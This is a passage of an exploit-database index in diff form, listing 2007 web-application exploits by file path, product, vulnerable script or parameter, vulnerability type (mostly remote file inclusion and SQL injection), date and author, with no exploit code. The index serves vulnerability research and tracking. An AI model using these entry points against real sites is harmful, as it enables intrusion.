+3699,exploits/php/webapps/3699.txt,"PHPGalleryScript 1.0 - 'init.gallery.php?include_class' Remote File Inclusion",2007-04-10,anonymous,webapps,php, +3700,exploits/php/webapps/3700.txt,"Weatimages 1.7.1 - ini[langpack] Remote File Inclusion",2007-04-10,Co-Sarper-Der,webapps,php, +3701,exploits/php/webapps/3701.txt,"Crea-Book 1.0 - Admin Access Bypass / Database Disclosure / Code Execution",2007-04-10,Xst3nZ,webapps,php, +3702,exploits/php/webapps/3702.php,"InoutMailingListManager 3.1 - Remote Command Execution",2007-04-10,BlackHawk,webapps,php, +3703,exploits/php/webapps/3703.txt,"Joomla! / Mambo Component Taskhopper 1.1 - Remote File Inclusion",2007-04-10,"Cold Zero",webapps,php, +3704,exploits/php/webapps/3704.txt,"pl-PHP Beta 0.9 - Multiple Vulnerabilities",2007-04-10,Omni,webapps,php, +3705,exploits/php/webapps/3705.txt,"SimpCMS 04.10.2007 - 'site' Remote File Inclusion",2007-04-10,Dr.RoVeR,webapps,php, +3706,exploits/php/webapps/3706.txt,"Mambo Component zOOm Media Gallery 2.5 Beta 2 - Remote File Inclusion",2007-04-11,iskorpitx,webapps,php, +3707,exploits/php/webapps/3707.txt,"TOSMO/Mambo 1.4.13a - 'absolute_path' Remote File Inclusion",2007-04-11,"Cold Zero",webapps,php, +3710,exploits/php/webapps/3710.php,"PunBB 1.2.14 - Remote Code Execution",2007-04-11,DarkFig,webapps,php, +3711,exploits/php/webapps/3711.html,"CodeBreak 1.1.2 - 'codebreak.php' Remote File Inclusion",2007-04-11,"John Martinelli",webapps,php, +3712,exploits/php/webapps/3712.txt,"Mambo Module Weather - 'absolute_path' Remote File Inclusion",2007-04-11,"Cold Zero",webapps,php, +3713,exploits/php/webapps/3713.txt,"Mambo Module Calendar (Agenda) 1.5.5 - Remote File Inclusion",2007-04-11,"Cold Zero",webapps,php, +3714,exploits/php/webapps/3714.txt,"Joomla! Component mosmedia 1.0.8 - Remote File Inclusion",2007-04-11,GoLd_M,webapps,php, +3716,exploits/php/webapps/3716.pl,"mxBB Module MX Shotcast 1.0 RC2 - 'getinfo1.php' Remote File Inclusion",2007-04-12,bd0rk,webapps,php, +3717,exploits/php/webapps/3717.txt,"WebKalk2 1.9.0 - 'absolute_path' Remote File Inclusion",2007-04-12,GoLd_M,webapps,php, +3718,exploits/php/webapps/3718.txt,"RicarGBooK 1.2.1 - 'lang' Local File Inclusion",2007-04-12,Dj7xpl,webapps,php, +3719,exploits/php/webapps/3719.pl,"MyBulletinBoard (MyBB) 1.2.2 - 'CLIENT-IP' SQL Injection",2007-04-12,Elekt,webapps,php, +3721,exploits/php/webapps/3721.pl,"e107 0.7.8 - 'mailout.php' Authenticated Access Escalation",2007-04-12,Gammarays,webapps,php, +3722,exploits/php/webapps/3722.txt,"Expow 0.8 - 'autoindex.php?cfg_file' Remote File Inclusion",2007-04-12,mdx,webapps,php, +3723,exploits/php/webapps/3723.txt,"Request It 1.0b - 'index.php?id' Remote File Inclusion",2007-04-12,hackberry,webapps,php, +3725,exploits/php/webapps/3725.php,"Chatness 2.5.3 - '/options.php/save.php' Remote Code Execution",2007-04-12,Gammarays,webapps,php, +3729,exploits/php/webapps/3729.txt,"Quick and Dirty Blog (qdblog) 0.4 - SQL Injection / Local File Inclusion",2007-04-13,Omni,webapps,php, +3731,exploits/php/webapps/3731.php,"Frogss CMS 0.7 - SQL Injection",2007-04-13,Kacper,webapps,php, +3732,exploits/php/webapps/3732.txt,"Garennes 0.6.1 - 'repertoire_config' Remote File Inclusion",2007-04-13,GoLd_M,webapps,php, +3733,exploits/php/webapps/3733.txt,"Pixaria Gallery 1.x - 'class.Smarty.php' Remote File Inclusion",2007-04-14,irvian,webapps,php, +3734,exploits/php/webapps/3734.txt,"Joomla! Component module autostand 1.0 - Remote File Inclusion",2007-04-14,"Cold Zero",webapps,php, +3735,exploits/php/webapps/3735.txt,"LS Simple Guestbook 1.0 - Remote Code Execution",2007-04-14,Gammarays,webapps,php, +3736,exploits/php/webapps/3736.txt,"Joomla! / Mambo Component New Article 1.1 - Remote File Inclusion",2007-04-14,"Cold Zero",webapps,php, +3739,exploits/php/webapps/3739.php,"Papoo 3.02 - kontakt menuid SQL Injection",2007-04-15,Kacper,webapps,php, +3741,exploits/php/webapps/3741.txt,"CNStats 2.9 - 'who_r.php?bj' Remote File Inclusion",2007-04-15,irvian,webapps,php, +3742,exploits/php/webapps/3742.pl,"NMDeluxe 1.0.1 - 'footer.php?template' Local File Inclusion",2007-04-15,BeyazKurt,webapps,php, +3743,exploits/php/webapps/3743.txt,"Gallery 1.2.5 - 'GALLERY_BASEDIR' Multiple Remote File Inclusions",2007-04-15,GoLd_M,webapps,php, +3744,exploits/php/webapps/3744.txt,"audioCMS arash 0.1.4 - 'arashlib_dir' Remote File Inclusion",2007-04-15,GoLd_M,webapps,php, +3745,exploits/php/webapps/3745.txt,"Web Slider 0.6 - 'path' Remote File Inclusion",2007-04-15,GoLd_M,webapps,php, +3747,exploits/php/webapps/3747.txt,"openMairie 1.10 - '/scr/soustab.php' Local File Inclusion",2007-04-16,GoLd_M,webapps,php, +3748,exploits/php/webapps/3748.txt,"SunShop Shopping Cart 3.5 - 'abs_path' Remote File Inclusion",2007-04-16,irvian,webapps,php, +3749,exploits/php/webapps/3749.txt,"StoreFront for Gallery - 'GALLERY_BASEDIR' Remote File Inclusion",2007-04-16,"Alkomandoz Hacker",webapps,php, +3750,exploits/php/webapps/3750.txt,"xoops module tsdisplay4xoops 0.1 - Remote File Inclusion",2007-04-16,GoLd_M,webapps,php, +3751,exploits/php/webapps/3751.txt,"Anthologia 0.5.2 - 'index.php?ads_file' Remote File Inclusion",2007-04-17,Dj7xpl,webapps,php, +3752,exploits/php/webapps/3752.txt,"AjPortal2Php - 'PagePrefix' Remote File Inclusion",2007-04-17,"Alkomandoz Hacker",webapps,php, +3753,exploits/php/webapps/3753.txt,"Joomla! Component JoomlaPack 1.0.4a2 RE - 'CAltInstaller.php' Remote File Inclusion",2007-04-17,"Cold Zero",webapps,php, +3754,exploits/php/webapps/3754.pl,"MiniGal b13 - Remote Code Execution",2007-04-17,Dj7xpl,webapps,php, +3756,exploits/php/webapps/3756.txt,"Cabron Connector 1.1.0-Full - Remote File Inclusion",2007-04-17,Dj7xpl,webapps,php, +3758,exploits/php/webapps/3758.php,"ShoutPro 1.5.2 - 'shout.php' Remote Code Injection",2007-04-17,Gammarays,webapps,php, +3759,exploits/php/webapps/3759.pl,"Joomla! Component Template Be2004-2 - 'index.php' Remote File Inclusion",2007-04-17,"Cold Zero",webapps,php, +3760,exploits/php/webapps/3760.txt,"jGallery 1.3 - 'index.php' Remote File Inclusion",2007-04-18,Dj7xpl,webapps,php, +3761,exploits/php/webapps/3761.txt,"Mozzers SubSystem final - 'subs.php' Remote Code Execution",2007-04-18,Dj7xpl,webapps,php, +3762,exploits/php/webapps/3762.html,"AimStats 3.2 - 'process.php?update' Remote Code Execution",2007-04-18,Dj7xpl,webapps,php, +3763,exploits/php/webapps/3763.txt,"Rezervi 0.9 - 'root' Remote File Inclusion",2007-04-18,GoLd_M,webapps,php, +3764,exploits/php/webapps/3764.txt,"Zomplog 3.8 - 'force_download.php' Remote File Disclosure",2007-04-18,Dj7xpl,webapps,php, +3765,exploits/php/webapps/3765.txt,"opensurveypilot 1.2.1 - Remote File Inclusion",2007-04-18,"Alkomandoz Hacker",webapps,php, +3766,exploits/php/webapps/3766.txt,"Mx Module Smartor Album FAP 2.0 RC 1 - Remote File Inclusion",2007-04-19,bd0rk,webapps,php, +3767,exploits/asp/webapps/3767.txt,"CreaDirectory 1.2 - 'error.asp?id' SQL Injection",2007-04-19,CyberGhost,webapps,asp, +3771,exploits/php/webapps/3771.txt,"Supasite 1.23b - Multiple Remote File Inclusions",2007-04-21,GoLd_M,webapps,php, +3773,exploits/php/webapps/3773.txt,"JChit counter 1.0.0 - 'imgsrv.php?ac' Remote File Disclosure",2007-04-22,Dj7xpl,webapps,php, +3774,exploits/php/webapps/3774.txt,"PHP-Ring Webring System 0.9 - SQL Injection",2007-04-22,Dj7xpl,webapps,php, +3775,exploits/php/webapps/3775.txt,"Maran PHP Forum - 'forum_write.php' Remote Code Execution",2007-04-22,Dj7xpl,webapps,php, +3778,exploits/php/webapps/3778.txt,"WEBInsta FM 0.1.4 - 'login.php' absolute_path Remote File Inclusion",2007-04-23,g00ns,webapps,php, +3780,exploits/php/webapps/3780.pl,"MyBulletinBoard (MyBB) 1.2.5 - 'calendar.php' Blind SQL Injection",2007-04-23,0x86,webapps,php, +3781,exploits/php/webapps/3781.txt,"Joomla! 1.5.0 Beta - 'pcltar.php' Remote File Inclusion",2007-04-23,Omid,webapps,php, +3783,exploits/php/webapps/3783.txt,"Pagode 0.5.8 - 'navigator_ok.php?asolute' Remote File Disclosure",2007-04-23,GoLd_M,webapps,php, +3785,exploits/php/webapps/3785.txt,"Post REvolution 0.7.0 RC 2 - 'dir' Remote File Inclusion",2007-04-23,InyeXion,webapps,php, +3786,exploits/php/webapps/3786.txt,"GPB Bulletin Board - Multiple Remote File Inclusions",2007-04-24,"ThE TiGeR",webapps,php, +3794,exploits/php/webapps/3794.txt,"USP FOSS Distribution 1.01 - 'dnld' Remote File Disclosure",2007-04-24,GoLd_M,webapps,php, +3795,exploits/php/webapps/3795.txt,"Advanced Webhost Billing System (AWBS) 2.4.0 - 'cart2.php' Remote File Inclusion",2007-04-24,DamaR,webapps,php, +3796,exploits/php/webapps/3796.html,"wavewoo 0.1.1 - 'loading.php?path_include' Remote File Inclusion",2007-04-24,kezzap66345,webapps,php, +3799,exploits/php/webapps/3799.txt,"JulmaCMS 1.4 - 'file.php' Remote File Disclosure",2007-04-25,GoLd_M,webapps,php, +3800,exploits/php/webapps/3800.txt,"Ext 1.0 - 'feed-proxy.php?feed' Remote File Disclosure",2007-04-25,"Alkomandoz Hacker",webapps,php, +3802,exploits/php/webapps/3802.txt,"PHPBandManager 0.8 - 'index.php?pg' Remote File Inclusion",2007-04-26,koray,webapps,php, +3803,exploits/php/webapps/3803.txt,"PHPOracleView - 'include_all.inc.php?page_dir' Remote File Inclusion",2007-04-26,"Alkomandoz Hacker",webapps,php, +3805,exploits/php/webapps/3805.txt,"Firefly 1.1.01 - 'doc_root' Remote File Inclusion",2007-04-26,"Alkomandoz Hacker",webapps,php, +3806,exploits/php/webapps/3806.txt,"EsForum 3.0 - 'forum.php?idsalon' SQL Injection",2007-04-26,"ilker Kandemir",webapps,php, +3809,exploits/php/webapps/3809.txt,"burnCMS 0.2 - 'root' Remote File Inclusion",2007-04-27,GoLd_M,webapps,php, +3813,exploits/php/webapps/3813.txt,"PostNuke pnFlashGames Module 1.5 - SQL Injection",2007-04-28,"Mehmet Ince",webapps,php, +3814,exploits/php/webapps/3814.txt,"WordPress Plugin mygallery 1.4b4 - Remote File Inclusion",2007-04-29,GoLd_M,webapps,php, +3816,exploits/php/webapps/3816.php,"TCExam 4.0.011 - 'SessionUserLang' Shell Injection",2007-04-29,rgod,webapps,php, +3817,exploits/php/webapps/3817.txt,"Imageview 5.3 - 'fileview.php?album' Local File Inclusion",2007-04-29,DNX,webapps,php, +3818,exploits/php/webapps/3818.html,"The Merchant 2.2.0 - 'index.php?show' Remote File Inclusion",2007-04-29,kezzap66345,webapps,php, +3820,exploits/php/webapps/3820.php,"psipuss 1.0 - 'editusers.php' Remote Change Admin Password",2007-04-30,Dj7xpl,webapps,php, +3824,exploits/php/webapps/3824.txt,"WordPress Plugin wp-Table 1.43 - 'inc_dir' Remote File Inclusion",2007-05-01,K-159,webapps,php, +3825,exploits/php/webapps/3825.txt,"WordPress Plugin wordTube 1.43 - 'wpPATH' Remote File Inclusion",2007-05-01,K-159,webapps,php, +3827,exploits/php/webapps/3827.txt,"Sendcard 3.4.1 - 'sendcard.php?form' Local File Inclusion",2007-05-01,ettee,webapps,php, +3828,exploits/php/webapps/3828.txt,"WordPress Plugin myflash 1.00 - 'wppath' Remote File Inclusion",2007-05-01,Crackers_Child,webapps,php, +3831,exploits/asp/webapps/3831.txt,"PStruh-CZ 1.3/1.5 - 'download.asp' File Disclosure",2007-05-02,Dj7xpl,webapps,asp, +3832,exploits/php/webapps/3832.txt,"1024 CMS 0.7 - 'download.php' Remote File Disclosure",2007-05-02,Dj7xpl,webapps,php, +3833,exploits/php/webapps/3833.pl,"mxBB Module FAQ & RULES 2.0.0 - Remote File Inclusion",2007-05-02,bd0rk,webapps,php, +3834,exploits/php/webapps/3834.php,"YaPiG 0.95b - Remote Code Execution",2007-05-02,Dj7xpl,webapps,php, +3835,exploits/php/webapps/3835.txt,"PostNuke Module v4bJournal - SQL Injection",2007-05-02,"Ali Abbasi",webapps,php, +3837,exploits/php/webapps/3837.txt,"phpChess Community Edition 2.0 - Multiple Remote File Inclusions",2007-05-03,GoLd_M,webapps,php, +3838,exploits/php/webapps/3838.txt,"Open Translation Engine (OTE) 0.7.8 - 'header.php?ote_home' Remote File Inclusion",2007-05-03,GoLd_M,webapps,php, +3839,exploits/php/webapps/3839.txt,"PHP Coupon Script 3.0 - 'bus' SQL Injection",2007-05-03,"Mehmet Ince",webapps,php, +3840,exploits/php/webapps/3840.txt,"Pre Classifieds Listings 1.0 - SQL Injection",2007-05-03,"Mehmet Ince",webapps,php, +3841,exploits/php/webapps/3841.txt,"Pre News Manager 1.0 - SQL Injection",2007-05-03,"Mehmet Ince",webapps,php, +3842,exploits/php/webapps/3842.txt,"Pre Shopping Mall 1.0 - SQL Injection",2007-05-03,"Mehmet Ince",webapps,php, +3843,exploits/php/webapps/3843.txt,"Censura 1.15.04 - 'censura.php?vendorid' SQL Injection",2007-05-03,"Mehmet Ince",webapps,php, +3846,exploits/php/webapps/3846.txt,"E-GADS! 2.2.6 - 'common.php?locale' Remote File Inclusion",2007-05-04,kezzap66345,webapps,php, +3847,exploits/php/webapps/3847.txt,"Versado CMS 1.07 - 'ajax_listado.php?urlModulo' Remote File Inclusion",2007-05-04,kezzap66345,webapps,php, +3848,exploits/php/webapps/3848.txt,"workbench 0.11 - 'header.php?path' Remote File Inclusion",2007-05-04,kezzap66345,webapps,php, +3849,exploits/php/webapps/3849.txt,"XOOPS Flashgames Module 1.0.1 - SQL Injection",2007-05-04,"Mehmet Ince",webapps,php, +3850,exploits/php/webapps/3850.php,"RunCMS 1.5.2 - 'debug_show.php' SQL Injection",2007-05-04,rgod,webapps,php, +3852,exploits/php/webapps/3852.txt,"PMECMS 1.0 - config[pathMod] Remote File Inclusion",2007-05-04,GoLd_M,webapps,php, +3853,exploits/php/webapps/3853.txt,"Persism CMS 0.9.2 - system[path] Remote File Inclusion",2007-05-04,GoLd_M,webapps,php, +3854,exploits/php/webapps/3854.txt,"PHP TopTree BBS 2.0.1a - 'right_file' Remote File Inclusion",2007-05-04,kezzap66345,webapps,php, +3855,exploits/php/webapps/3855.php,"Net Portal Dynamic System (NPDS) 5.10 - Remote Code Execution (2)",2007-05-04,Gu1ll4um3r0m41n,webapps,php, +3857,exploits/php/webapps/3857.txt,"vm Watermark for Gallery 0.4.1 - Remote File Inclusion",2007-05-05,"ThE TiGeR",webapps,php, +3858,exploits/php/webapps/3858.php,"Nuked-klaN 1.7.6 - Remote Code Execution",2007-05-05,DarkFig,webapps,php, +3859,exploits/php/webapps/3859.txt,"Archangel Weblog 0.90.02 - Local File Inclusion / Authentication Bypass",2007-05-05,Dj7xpl,webapps,php, +3860,exploits/php/webapps/3860.txt,"PHPtree 1.3 - 'cms2.php?s_dir' Remote File Inclusion",2007-05-05,"ThE TiGeR",webapps,php, +3861,exploits/php/webapps/3861.txt,"NoAh 0.9 pre 1.2 - 'mfa_theme.php' Remote File Inclusion",2007-05-06,kezzap66345,webapps,php, +3862,exploits/php/webapps/3862.txt,"XOOPS Module wfquotes 1.0 - SQL Injection",2007-05-06,"Mehmet Ince",webapps,php, +3863,exploits/php/webapps/3863.txt,"Wikivi5 - 'show.php?sous_rep' Remote File Inclusion",2007-05-06,GoLd_M,webapps,php, +3864,exploits/php/webapps/3864.txt,"Friendly 1.0d1 - 'friendly_path' Remote File Inclusion",2007-05-06,GoLd_M,webapps,php, +3865,exploits/php/webapps/3865.txt,"Tropicalm Crowell Resource 4.5.2 - 'RESPATH' Remote File Inclusion",2007-05-07,kezzap66345,webapps,php, +3867,exploits/php/webapps/3867.pl,"ACGVAnnu 1.3 - 'acgv.php?rubrik' Local File Inclusion",2007-05-07,BeyazKurt,webapps,php, +3868,exploits/php/webapps/3868.txt,"DynamicPAD 1.02.18 - 'HomeDir' Remote File Inclusion",2007-05-07,"ThE TiGeR",webapps,php, +3869,exploits/php/webapps/3869.txt,"Berylium2 2003-08-18 - 'beryliumroot' Remote File Inclusion",2007-05-07,"ThE TiGeR",webapps,php, +3870,exploits/php/webapps/3870.txt,"LaVague 0.3 - 'printbar.php?views_path' Remote File Inclusion",2007-05-08,kezzap66345,webapps,php, +3874,exploits/php/webapps/3874.txt,"CGX 20050314 - 'pathCGX' Remote File Inclusion",2007-05-08,GoLd_M,webapps,php, +3875,exploits/php/webapps/3875.txt,"PHPLojaFacil 0.1.5 - 'path_local' Remote File Inclusion",2007-05-08,GoLd_M,webapps,php, +3876,exploits/php/webapps/3876.txt,"GNUEDU 1.3b2 - Multiple Remote File Inclusions",2007-05-08,GoLd_M,webapps,php, +3878,exploits/php/webapps/3878.txt,"Miplex2 - 'SmartyFU.class.php' Remote File Inclusion",2007-05-08,"ThE TiGeR",webapps,php, +3879,exploits/php/webapps/3879.html,"phpMyPortal 3.0.0 RC3 - GLOBALS[CHEMINMODULES] Remote File Inclusion",2007-05-09,GoLd_M,webapps,php, +3884,exploits/php/webapps/3884.txt,"aForum 1.32 - 'CommonAbsDir' Remote File Inclusion",2007-05-09,"ThE TiGeR",webapps,php, +3885,exploits/php/webapps/3885.txt,"telltarget 1.3.3 - 'tt_docroot' Remote File Inclusion",2007-05-09,GoLd_M,webapps,php, +3886,exploits/php/webapps/3886.pl,"SimpleNews 1.0.0 FINAL - 'print.php?news_id' SQL Injection",2007-05-09,Silentz,webapps,php, +3887,exploits/php/webapps/3887.pl,"TutorialCMS 1.00 - 'search.php?search' SQL Injection",2007-05-09,Silentz,webapps,php, +3894,exploits/php/webapps/3894.txt,"Original 0.11 - 'config.inc.php?x[1]' Remote File Inclusion",2007-05-10,GoLd_M,webapps,php, +3895,exploits/php/webapps/3895.txt,"Thyme Calendar 1.3 - SQL Injection",2007-05-10,warlord,webapps,php, +3896,exploits/php/webapps/3896.pl,"TaskDriver 1.2 - Authentication Bypass / SQL Injection",2007-05-10,Silentz,webapps,php, +3900,exploits/php/webapps/3900.php,"Snaps! Gallery 1.4.4 - Remote User Pass Change",2007-05-11,Dj7xpl,webapps,php, +3901,exploits/php/webapps/3901.txt,"maGAZIn 2.0 - 'PHPThumb.php?src' Remote File Disclosure",2007-05-11,Dj7xpl,webapps,php, +3902,exploits/php/webapps/3902.txt,"R2K Gallery 1.7 - 'galeria.php?lang2' Local File Inclusion",2007-05-11,Dj7xpl,webapps,php, +3903,exploits/php/webapps/3903.php,"Monalbum 0.8.7 - Remote Code Execution",2007-05-11,Dj7xpl,webapps,php, +3905,exploits/asp/webapps/3905.txt,"W1L3D4 philboard 0.2 - 'W1L3D4_bolum.asp' SQL Injection",2007-05-11,gsy,webapps,asp, +3906,exploits/php/webapps/3906.html,"PHP FirstPost 0.1 - 'block.php?Include' Remote File Inclusion",2007-05-12,Dj7xpl,webapps,php, +3907,exploits/php/webapps/3907.txt,"iG Shop 1.4 - 'page.php' SQL Injection",2007-05-12,gsy,webapps,php, +3908,exploits/php/webapps/3908.txt,"YAAP 1.5 - '__autoload()' Remote File Inclusion",2007-05-12,3l3ctric-Cracker,webapps,php, +3909,exploits/php/webapps/3909.txt,"Beacon 0.2.0 - 'splash.lang.php' Remote File Inclusion",2007-05-12,"ThE TiGeR",webapps,php, +3911,exploits/php/webapps/3911.txt,"EfesTECH Haber 5.0 - 'id' SQL Injection",2007-05-14,CyberGhost,webapps,php, +3914,exploits/asp/webapps/3914.txt,"BlogMe 3.0 - 'archshow.asp?var' SQL Injection",2007-05-13,gsy,webapps,asp, +3915,exploits/php/webapps/3915.txt,"CJG EXPLORER PRO 3.2 - 'g_pcltar_lib_dir' Remote File Inclusion",2007-05-13,Mogatil,webapps,php, +3918,exploits/php/webapps/3918.txt,"phpAtm 1.30 - 'downloadfile' Remote File Disclosure",2007-05-13,Ali.Mohajem,webapps,php, +3919,exploits/php/webapps/3919.txt,"NagiosQL 2005 2.00 - 'prepend_adm.php' Remote File Inclusion",2007-05-14,"ThE TiGeR",webapps,php, +3920,exploits/php/webapps/3920.txt,"Feindt Computerservice News 2.0 - 'newsadmin.php?action' Remote File Inclusion",2007-05-14,Mogatil,webapps,php, +3923,exploits/php/webapps/3923.txt,"linksnet newsfeed 1.0 - Remote File Inclusion",2007-05-14,"ThE TiGeR",webapps,php, +3924,exploits/php/webapps/3924.txt,"Media Gallery for Geeklog 1.4.8a - Remote File Inclusion",2007-05-14,"ThE TiGeR",webapps,php, +3928,exploits/php/webapps/3928.txt,"Achievo 1.1.0 - 'config_atkroot' Remote File Inclusion",2007-05-15,Katatafish,webapps,php, +3931,exploits/php/webapps/3931.html,"XOOPS Module resmanager 1.21 - Blind SQL Injection",2007-05-15,ajann,webapps,php, +3932,exploits/php/webapps/3932.pl,"XOOPS Module Glossarie 1.7 - 'sid' SQL Injection",2007-05-15,ajann,webapps,php, +3933,exploits/php/webapps/3933.pl,"XOOPS Module MyConference 1.0 - 'index.php' SQL Injection",2007-05-15,ajann,webapps,php, +3935,exploits/php/webapps/3935.txt,"Glossword 1.8.1 - 'custom_vars.php' Remote File Inclusion",2007-05-16,BeyazKurt,webapps,php, +3936,exploits/asp/webapps/3936.txt,"runawaysoft haber portal 1.0 - 'tr' Multiple Vulnerabilities",2007-05-16,kerem125,webapps,asp, +3941,exploits/php/webapps/3941.txt,"PHPGlossar 0.8 - 'format_menue' Remote File Inclusion",2007-05-16,kezzap66345,webapps,php, +3942,exploits/php/webapps/3942.pl,"SimpNews 2.40.01 - 'newnr' SQL Injection",2007-05-16,Silentz,webapps,php, +3943,exploits/php/webapps/3943.pl,"FAQEngine 4.16.03 - 'question.php?questionref' SQL Injection",2007-05-16,Silentz,webapps,php, +3944,exploits/php/webapps/3944.txt,"Mambo Component com_yanc 1.4 Beta - 'id' SQL Injection",2007-05-17,"Mehmet Ince",webapps,php, +3946,exploits/php/webapps/3946.txt,"GeekLog 2.x - 'ImageImageMagick.php' Remote File Inclusion",2007-05-17,diesl0w,webapps,php, +3947,exploits/php/webapps/3947.txt,"Build it Fast (bif3) 0.4.1 - Multiple Remote File Inclusions",2007-05-17,"Alkomandoz Hacker",webapps,php, +3948,exploits/php/webapps/3948.txt,"Libstats 1.0.3 - 'template_csv.php' Remote File Inclusion",2007-05-18,"Mehmet Ince",webapps,php, +3949,exploits/php/webapps/3949.txt,"MolyX BOARD 2.5.0 - 'index.php?lang' Local File Inclusion",2007-05-18,MurderSkillz,webapps,php, +3953,exploits/php/webapps/3953.txt,"SunLight CMS 5.3 - 'root' Remote File Inclusion",2007-05-19,"Mehmet Ince",webapps,php, +3955,exploits/php/webapps/3955.py,"Zomplog 3.8 - 'mp3playlist.php' SQL Injection",2007-05-20,NeoMorphS,webapps,php, +3956,exploits/php/webapps/3956.php,"Alstrasoft e-Friends 4.21 - Admin Session Retrieve",2007-05-20,BlackHawk,webapps,php, +3957,exploits/php/webapps/3957.php,"Alstrasoft Live Support 1.21 - Admin Credential Retrieve",2007-05-20,BlackHawk,webapps,php, +3958,exploits/php/webapps/3958.php,"Alstrasoft Template Seller Pro 3.25 - Admin Password Change",2007-05-20,BlackHawk,webapps,php, +3959,exploits/php/webapps/3959.php,"Alstrasoft Template Seller Pro 3.25 - Remote Code Execution",2007-05-20,BlackHawk,webapps,php, +3960,exploits/php/webapps/3960.php,"WordPress 2.1.3 - 'admin-ajax.php' SQL Injection Blind Fishing",2007-05-21,waraxe,webapps,php, +3962,exploits/php/webapps/3962.txt,"Ol BookMarks Manager 0.7.4 - 'root' Remote File Inclusion",2007-05-21,"ThE TiGeR",webapps,php, +3963,exploits/php/webapps/3963.txt,"TutorialCMS 1.01 - Authentication Bypass",2007-05-21,Silentz,webapps,php, +3964,exploits/php/webapps/3964.txt,"Ol BookMarks Manager 0.7.4 - SQL Injection",2007-05-21,"Mehmet Ince",webapps,php, +3970,exploits/php/webapps/3970.txt,"BtiTracker 1.4.1 - Become Admin SQL Injection",2007-05-22,m@ge|ozz,webapps,php, +3971,exploits/php/webapps/3971.php,"NavBoard 2.6.0 - Remote Code Execution",2007-05-23,Dj7xpl,webapps,php, +3972,exploits/php/webapps/3972.txt,"Scallywag - 'template.php?path' Remote File Inclusion",2007-05-23,"Mehmet Ince",webapps,php, +3974,exploits/php/webapps/3974.pl,"Dokeos 1.8.0 - 'my_progress.php?course' SQL Injection",2007-05-23,Silentz,webapps,php, +3980,exploits/php/webapps/3980.pl,"Dokeos 1.6.5 - 'courseLog.php?scormcontopen' SQL Injection",2007-05-24,Silentz,webapps,php, +3981,exploits/php/webapps/3981.php,"CPCommerce 1.1.0 - 'id_category' SQL Injection",2007-05-24,Kacper,webapps,php, +3983,exploits/php/webapps/3983.txt,"FirmWorX 0.1.2 - Multiple Remote File Inclusions",2007-05-24,DeltahackingTEAM,webapps,php, +3987,exploits/php/webapps/3987.txt,"Webavis 0.1.1 - 'class.php?root' Remote File Inclusion",2007-05-25,"ThE TiGeR",webapps,php, +3988,exploits/php/webapps/3988.php,"gCards 1.46 - SQL Injection / Remote Code Execution",2007-05-25,Silentz,webapps,php, +3989,exploits/php/webapps/3989.pl,"My Little Forum 1.7 - 'user.php?id' SQL Injection",2007-05-25,Silentz,webapps,php, +3990,exploits/php/webapps/3990.txt,"vBulletin vBGSiteMap 2.41 - 'root' Remote File Inclusion",2007-05-25,"Cold Zero",webapps,php, +3991,exploits/php/webapps/3991.txt,"OpenBASE 0.6a - 'root_prefix' Remote File Inclusion",2007-05-25,DeltahackingTEAM,webapps,php, +3992,exploits/php/webapps/3992.txt,"FlaP 1.0b - 'pachtofile' Remote File Inclusion",2007-05-25,"Mehmet Ince",webapps,php, +3994,exploits/php/webapps/3994.txt,"Mazens PHP Chat V3 (basepath) - Remote File Inclusion",2007-05-26,"ThE TiGeR",webapps,php, +3995,exploits/php/webapps/3995.txt,"TROforum 0.1 - 'admin.php?site_url' Remote File Inclusion",2007-05-26,"Mehmet Ince",webapps,php, +3997,exploits/php/webapps/3997.txt,"Frequency Clock 0.1b - 'securelib' Remote File Inclusion",2007-05-27,"ThE TiGeR",webapps,php, +3998,exploits/php/webapps/3998.php,"Fundanemt 2.2.0 - 'spellcheck.php' Remote Code Execution",2007-05-27,Kacper,webapps,php, +3999,exploits/php/webapps/3999.txt,"Vistered Little 1.6a - 'skin' Remote File Disclosure",2007-05-28,GoLd_M,webapps,php, +4000,exploits/php/webapps/4000.txt,"wanewsletter 2.1.3 - Remote File Inclusion",2007-05-28,Mogatil,webapps,php, +4003,exploits/php/webapps/4003.sh,"Joomla! Component Phil-a-Form 1.2.0.0 - SQL Injection",2007-05-28,CypherXero,webapps,php, +4004,exploits/php/webapps/4004.php,"Inout Search Engine - Remote Code Execution",2007-05-29,BlackHawk,webapps,php, +4005,exploits/php/webapps/4005.txt,"AdminBot 9.0.5 - 'live_status.lib.php' Remote File Inclusion",2007-05-29,"ThE TiGeR",webapps,php, +4006,exploits/php/webapps/4006.php,"Pheap 2.0 - Authentication Bypass / Remote Code Execution",2007-05-29,Silentz,webapps,php, +4007,exploits/asp/webapps/4007.txt,"Vizayn Urun Tanitim Sistemi 0.2 - 'tr' SQL Injection",2007-05-30,BAHADIR,webapps,asp, +4019,exploits/php/webapps/4019.php,"Particle Gallery 1.0.1 - SQL Injection",2007-06-01,Silentz,webapps,php, +4020,exploits/php/webapps/4020.php,"RevokeBB 1.0 RC4 - Blind SQL Injection / Hash Retrieve",2007-06-01,BlackHawk,webapps,php, +4022,exploits/php/webapps/4022.html,"XOOPS Module icontent 1.0/4.5 - Remote File Inclusion",2007-06-01,GoLd_M,webapps,php, +4025,exploits/php/webapps/4025.php,"Quick.Cart 2.2 - Local/Remote File Inclusion / Remote Code Execution",2007-06-02,Kacper,webapps,php, +4026,exploits/php/webapps/4026.php,"PNPHPBB2 < 1.2 - 'index.php' SQL Injection",2007-06-03,Kacper,webapps,php, +4029,exploits/php/webapps/4029.php,"Sendcard 3.4.1 - Local File Inclusion / Remote Code Execution",2007-06-04,Silentz,webapps,php, +4030,exploits/php/webapps/4030.php,"EQdkp 1.3.2 - 'listmembers.php' SQL Injection",2007-06-04,Silentz,webapps,php, +4031,exploits/php/webapps/4031.txt,"Madirish Webmail 2.0 - 'addressbook.php' Remote File Inclusion",2007-06-04,BoZKuRTSeRDaR,webapps,php, +4034,exploits/php/webapps/4034.txt,"Kravchuk letter script 1.0 - 'scdir' Remote File Inclusion",2007-06-05,"Mehmet Ince",webapps,php, +4035,exploits/php/webapps/4035.txt,"Comicsense 0.2 - 'index.php?epi' SQL Injection (1)",2007-06-05,s0cratex,webapps,php, +4036,exploits/php/webapps/4036.php,"PBLang 4.67.16.a - Remote Code Execution",2007-06-06,Silentz,webapps,php, +4037,exploits/php/webapps/4037.pl,"Comicsense 0.2 - 'index.php?epi' SQL Injection (2)",2007-06-06,Silentz,webapps,php, +4039,exploits/php/webapps/4039.txt,"WordPress 2.2 - 'xmlrpc.php' SQL Injection",2007-06-06,Slappter,webapps,php, +4040,exploits/asp/webapps/4040.txt,"Kartli Alisveris Sistemi 1.0 - SQL Injection",2007-06-06,kerem125,webapps,asp, 